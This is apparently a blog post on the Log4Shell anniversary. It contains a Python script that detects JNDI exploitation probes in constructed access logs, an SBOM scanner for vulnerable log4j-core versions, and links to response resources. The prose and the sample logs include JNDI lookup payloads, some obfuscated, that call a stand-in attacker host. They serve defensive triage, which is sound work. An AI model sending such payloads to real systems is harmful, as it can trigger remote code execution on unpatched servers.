December 8, 2022
December 10, 2021. For many, this date brings back nightmares, cold sweats, and panic. On this day, CVE-2021-44228 was published. A novel security vulnerability had been found in Log4j, a logging library used in Java development since 2001. Log4j could be provoked into fetching and executing code from an attacker’s host: it expanded lookup expressions embedded in logged data, so a string such as ${jndi:ldap://attacker-host/x} placed in a request header or any other logged field triggered a JNDI lookup to that host. And because Log4j was widely used in on-premises software, software as a service (SaaS), and internally developed applications, the vulnerability was sure to reach far and wide.
Over the next several days, the vulnerability, soon named Log4Shell, dominated technologists’ social media feeds, disrupted vacations and holiday joy, and was possibly the wake-up call many organizations needed.
As Randy Shoup et al. describe in their paper Responding to Novel Security Vulnerabilities, “Vulnerable versions of Log4j were in organizations’ applications’ direct dependencies and in their transitive dependencies. It was embedded in vendor products, including monitoring, visualization, and security tools. Mitigating this vulnerability required companies to change application configurations in anything Java-based. Remediating it required dependency updates, testing and deployment cycles, and redeployment of vendor software.”
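As an added illustration, not part of the original post, here is a small Python triage script of the kind responders wrote that week to flag Log4Shell exploitation attempts in web-server access logs. The log lines are constructed, not real traffic, and the hostnames in them are made up. The script undoes the two obfuscations that defeated naive grepping for ${jndi: in the first days: percent-encoding, and nested lookups such as ${${lower:j}ndi:...} that Log4j itself would have resolved before the JNDI lookup fired.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not real traffic): one benign request,
# a plain JNDI lookup in the User-Agent, a nested-lookup obfuscation in the
# query string, and a percent-encoded lookup in the path.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 404 0 "-" "-"',
]

# What we ultimately look for once the obfuscation has been undone.
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Innermost lookups that evaluate to plain text and were used to hide the word
# "jndi": ${lower:X}, ${upper:X}, and any lookup with a default value such as
# ${env:UNSET:-X} or ${::-X}, which Log4j evaluates to X when the key is absent.
INNER_LOOKUP_RE = re.compile(
    r"\$\{(?:(lower|upper):([^${}]*)|[^${}]*:-([^${}]*))\}", re.IGNORECASE
)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo percent-encoding, then collapse inner lookups from the inside out."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded

    def resolve(m: re.Match) -> str:
        if m.group(1):
            value = m.group(2)
            return value.lower() if m.group(1).lower() == "lower" else value.upper()
        return m.group(3)

    for _ in range(max_rounds):
        collapsed = INNER_LOOKUP_RE.sub(resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after normalization."""
    return JNDI_RE.search(normalize(line)) is not None


def find_probes(lines):
    """Indexes of the lines that look like Log4Shell exploitation attempts."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for i in find_probes(SAMPLE_LOG_LINES):
        print(f"line {i}: {normalize(SAMPLE_LOG_LINES[i])}")
```

The script only handles the obfuscations listed in its comments (there were others, for example splitting the hostname across further lookups), so a miss is not proof of absence. It is a triage aid for scoping who was probed; the fix was still the dependency update the paper quoted below describes.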
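The quoted passage describes an inventory problem: before anything can be remediated, someone has to find every copy of log4j-core, including the ones a vendor artifact pulls in transitively. As an added example that is not from the paper, the Python below walks a constructed CycloneDX-style SBOM and reports each affected log4j-core version together with the component path that brought it in. The affected ranges are the ones published for CVE-2021-44228 (first fixed in 2.15.0, with backports 2.12.2 for Java 7 and 2.3.1 for Java 6); the SBOM contents, component names and package URLs are made up for the example.

```python
import json
import re

# Constructed CycloneDX-style SBOM for a fictional service. The vendor SDK nests
# its own dependencies, which is how a transitive log4j-core copy shows up.
SAMPLE_SBOM_JSON = """
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "metadata": {"component": {"name": "payments-api", "version": "3.2.0"}},
  "components": [
    {"type": "library", "name": "log4j-core", "version": "2.14.1",
     "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
    {"type": "library", "name": "log4j-api", "version": "2.14.1",
     "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1"},
    {"type": "library", "name": "vendor-sdk", "version": "7.1.0",
     "purl": "pkg:maven/com.example/vendor-sdk@7.1.0",
     "components": [
       {"type": "library", "name": "log4j-core", "version": "2.0-beta9",
        "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.0-beta9"}
     ]},
    {"type": "library", "name": "log4j-core", "version": "2.12.2",
     "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.12.2"},
    {"type": "library", "name": "log4j", "version": "1.2.17",
     "purl": "pkg:maven/log4j/log4j@1.2.17"}
  ]
}
"""

# Affected log4j-core ranges for CVE-2021-44228 as [lower inclusive, upper exclusive).
# 2.15.0 was the first fix on the main line; 2.12.2 and 2.3.1 were backports for
# Java 7 and Java 6. Log4j 1.x is a separate code base and is outside this CVE.
AFFECTED_RANGES = [("2.0-beta9", "2.3.1"), ("2.4", "2.12.2"), ("2.13.0", "2.15.0")]

PURL_RE = re.compile(r"^pkg:maven/([^/]+)/([^@]+)@([^?#]+)")
QUALIFIER_RE = re.compile(r"([A-Za-z]+)(\d*)")
PRERELEASE_ORDER = {"alpha": 0, "beta": 1, "rc": 2}


def version_key(version: str):
    """Sort key for Maven-style versions; pre-releases sort before the final release.
    "2.0-beta9" -> ((2, 0, 0), 0, 1, 9); "2.14.1" -> ((2, 14, 1), 1, 0, 0)."""
    main, _, qualifier = version.partition("-")
    nums = tuple(int(p) for p in main.split("."))
    nums += (0,) * (3 - len(nums))
    if not qualifier:
        return (nums, 1, 0, 0)
    m = QUALIFIER_RE.match(qualifier)
    tag = m.group(1).lower() if m else qualifier.lower()
    n = int(m.group(2)) if m and m.group(2) else 0
    return (nums, 0, PRERELEASE_ORDER.get(tag, 3), n)


def is_affected(version: str) -> bool:
    k = version_key(version)
    return any(version_key(lo) <= k < version_key(hi) for lo, hi in AFFECTED_RANGES)


def find_affected(sbom: dict):
    """Walk nested components; return every affected log4j-core with its path."""
    hits = []

    def walk(components, path):
        for c in components:
            m = PURL_RE.match(c.get("purl", ""))
            if m and m.group(1) == "org.apache.logging.log4j" and m.group(2) == "log4j-core":
                if is_affected(m.group(3)):
                    hits.append({"version": m.group(3),
                                 "path": path + [c["name"]],
                                 "transitive": bool(path)})
            walk(c.get("components", []), path + [c["name"]])

    walk(sbom.get("components", []), [])
    return hits


def scan_sbom_json(text: str):
    return find_affected(json.loads(text))


if __name__ == "__main__":
    for hit in scan_sbom_json(SAMPLE_SBOM_JSON):
        kind = "transitive" if hit["transitive"] else "direct"
        print(f"{kind}: log4j-core {hit['version']} via {' -> '.join(hit['path'])}")
```

Two details matter in practice. The version comparison treats 2.0-beta9 as older than 2.0, so a naive string compare would have missed the earliest affected builds; and matching on the package URL rather than the display name avoids both false positives (log4j-api, Log4j 1.x) and the shaded or renamed jars a name-only search misses. An SBOM only helps if you have one for every artifact, vendor software included, which is exactly the gap the paper describes.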
The size and scope of this vulnerability highlighted for many organizations that they were still ill-prepared to respond to attacks of this nature. Despite increasing investment in IT security for known vulnerabilities, companies still face the mounting challenge of how to address novel vulnerabilities. How do we prepare for the unknown?
In the aftermath of Log4Shell, some organizations responded quickly and with relative ease, while others lost days before even beginning their response. As the first anniversary of Log4Shell approaches, we wanted to pull together resources that show what this community has learned and how we can better prepare for a future of unknowns.
At the 2022 DevOps Enterprise Forum, a summit of thought leaders from technology and business, Log4j was still top of mind. Log4j made clear that organizations naturally build defenses against vulnerabilities they have experienced in the past (known vulnerabilities). But as the last several years have shown, and as Log4j made especially plain, new classes of vulnerability continue to be discovered, including
These “novel” security vulnerabilities challenge organizations in several ways. First, the full scope and impact of a novel vulnerability may be unclear or difficult to determine. Second, novel vulnerabilities can require large-scale redeployment of infrastructure and application software. And third, attacks exploiting a novel vulnerability can affect customers at scale, which makes the organization’s response critically urgent.
In the paper Responding to Novel Security Vulnerabilities, authors Randy Shoup, Tapabrata Pal, Michael Nygard, Chris Hill, and Dominica DeGrandis provide leaders with examples and patterns to help create the adaptive capacity needed to prepare for, respond to, and learn from novel security threats. The paper also walks through three contrasting responses to Log4Shell: a good one, an okay one, and a bad one.
Read the full paper here.
In 2022, it’s more clear than ever that technology drives value and innovation in every organization, no matter the industry. And with that power and influence, there is more pressure from attackers. How can an organization position itself to respond effectively to these threats?
In this presentation from this week’s DevOps Enterprise Summit-Virtual, Nathen Harvey (Cloud Developer Advocate, Google) and Amanda Lewis (Developer Advocate, Google) use the Log4Shell experience to shed light on how to become a high-performing technology team.
In the first half of the presentation, Harvey and Lewis present a fictionalized story of one company’s response to Log4Shell. Then they show how the latest findings from Google’s DevOps Research and Assessment (DORA) program can help organizations build high-performing teams that are equipped to adapt to and deal with novel vulnerabilities.
Watch their full presentation here.
One big step toward fortifying your organization against both known and unknown threats is to bake security and governance into your software development process. We have all known for years that leaving security review and testing until the end of the delivery cycle, just before release, is fraught with issues. The call to “shift left” on security and audit compliance has been heard by many, but few have effectively achieved it.
In the latest novel from IT Revolution, Investments Unlimited, a team of practitioners and thought leaders shows how organizations can use automated governance to effectively “shift left” on security, audit, and more, all while making the lives of developers and operations staff happier.
Log4Shell was a huge influence on the authors, who were in the middle of writing the manuscript when the vulnerability hit. Their shared experiences of dealing with this and many other security vulnerabilities are all present in the novel.
Learn more about the book and start reading an excerpt here.
Log4Shell and other novel security vulnerabilities have pushed several topics to the forefront, such as software bills of materials (SBOMs), software supply chain security, and automated governance. Below is a list of blogs, articles, and papers that cover these topics and are a great resource on your organization’s journey to a more secure future.